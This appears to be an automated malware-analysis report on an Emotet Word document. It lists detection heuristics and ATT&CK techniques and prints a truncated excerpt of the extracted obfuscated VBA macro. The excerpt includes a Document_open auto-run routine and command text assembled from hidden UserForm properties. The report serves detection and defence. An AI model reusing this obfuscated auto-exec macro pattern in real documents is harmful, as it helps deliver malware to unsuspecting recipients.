Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open auto-execution macro, and utilizes CreateObject, indicative of a downloader. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' strongly suggests the use of a hidden UserForm to execute commands, a known technique for Emotet. ClamAV detection further confirms its malicious nature and identifies it as Emotet.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-7462723-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7462723-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10967 bytes |

SHA-256: 769fe73979304f43785ed253caafb54ee04ebd0684a62ddae0ab52d4fc3c2442

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Fobwlyxpcdd"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xzfzzpekt, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Gkkztgyuqmwfe = Dynnvubbcahoe
Pkfyefki = Mnwseludwmvje
Fihylstan = Zfvqtqjoig
Select _
Case Xomkihiggf
Case 703
Wcjsgtmjvsmpi _
= Hex _
(819)
Fzqrxaajkzhl = CVar(138)
Qftlwtqgq _
= Hex(495)
Case 342
Tvnfcxccocg = CVar(620)
Wywtztyitef _
= 232
Dlmcyjhbdeme = CDate _
(679)
Case 317
Fiecjqfo = _
CInt(427)
Xhxkharisitqq = Log(Ximtukor)
Zpbwwopnperl = Dnemzhpsrylh
End Select
Rwonupdjrk = Rkfstrybts
Muvlpwkav = Cweewhwnwty
Hnxyoorz = Aatrtuadp
Select _
Case Cwoncuwfwooy
Case 115
Bzlmgzpz _
= Hex _
(642)
Dcpcsvpi = CVar(774)
Frjkluuuh _
= Hex(382)
Case 143
Byosvoqibg = CVar(880)
Kkaftmazg _
= 555
Ykpbbmfvrxs = CDate _
(615)
Case 48
Akwhyztz = _
CInt(257)
Yaloahgsfx = Log(Hfnpwwkljsi)
Jqtaglqw = Aqxenkfmeuk
End Select
Xrfxikrbjt = Dfilqviflycou
Lhidkpztxwz = Viulhoauv
Pswzzprc = Ftapfgdlkprg
Select _
Case Ddqggbwqdh
Case 693
Tauhfxiopou _
= Hex _
(208)
Iwikokjr = CVar(732)
Wykvewpqtbnnd _
= Hex(675)
Case 87
Ktxmuoju = CVar(311)
Fnfowezgeyiub _
= 624
Zyauoutrherm = CDate _
(48)
Case 531
Hmegxzijcxxo = _
CInt(575)
Tupstuuqizpdl = Log(Jfrvowleoeejq)
Xaouympz = Xqdeqtnmlt
End Select
Erggvkote
End Sub
Attribute VB_Name = "Kgszqoekrxovz"
Attribute VB_Base = "0{ED59ADE0-B621-4AD0-9922-53E442FB5C2E}{B74B4113-2BC7-4C4A-9E09-EE09E0ACE9F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Pkkxwszjoh"
Function Ctwmsspajbnl()
Fjtddrtmx = Urkualrtiy
Upvyivcsj = Qdfgffctwbt
Bfvkylbjb = Oitkqvocyduqv
Select _
Case Ogfhfbgmxd
Case 915
Uxtdoahsxlrc _
= Hex _
(155)
Rkehpafmxve = CVar(962)
Xivwhrctefafp _
= Hex(700)
Case 159
Ncocfrjwip = CVar(248)
Mhaxytckkcpkk _
= 594
Medbzntyuhbo = CDate _
(234)
Case 157
Mmgtsqmeibl = _
CInt(875)
Clndshyw = Log(Nnlsifpxf)
Xpjqsighwcqnk = Hdjhhruisfh
End Select
Uytfuxviy = Fobwlyxpcdd.Xzfzzpekt
Deavfenuiyiby = Apntsbwhcg
Idejksawvp = Kbuxtvmesaefj
Yhxyocveqeoxi = Qlxpjrgzn
Select _
Case Yqiyyazvbpyr
Case 211
Owdtexegljth _
= Hex _
(614)
Fshjruef = CVar(704)
Foynwrstuvuu _
= Hex(251)
Case 416
Jjpreyfqg = CVar(8)
Ihoaipjzmnq _
= 394
Jurznyhkpca = CDate _
(689)
Case 803
Naymoiaxn = _
CInt(140)
Tlflvqss = Log(Hkgfdhqftfosd)
Bzzhztvko = Tvpzjhyg
End Select
Rvkblpdfitdv = Uytfuxviy + Kgszqoekrxovz.Oararlfqkzr + Kgszqoekrxovz.Vkvixncea + Kgszqoekrxovz.Fjwgfvwot
Kfwdcingw = Zzrvjkhkmnstx
Hkzmmiqdycnci = Yhvdltbazn
Yrrmyvebcg = Riwttvizicp
Select _
Case Uwegjzzqyslgq
Case 683
Dbhryhmdw _
= Hex _
(697)
Dfvbwcfoe = CVar(752)
Usgkwsqk _
= Hex(315)
Case 42
Hbwgvxnq = CVar(915)
Hxcwtvxwjbbj _
= 813
Golnltmm = CDate _
(689)
Case 41
... (truncated)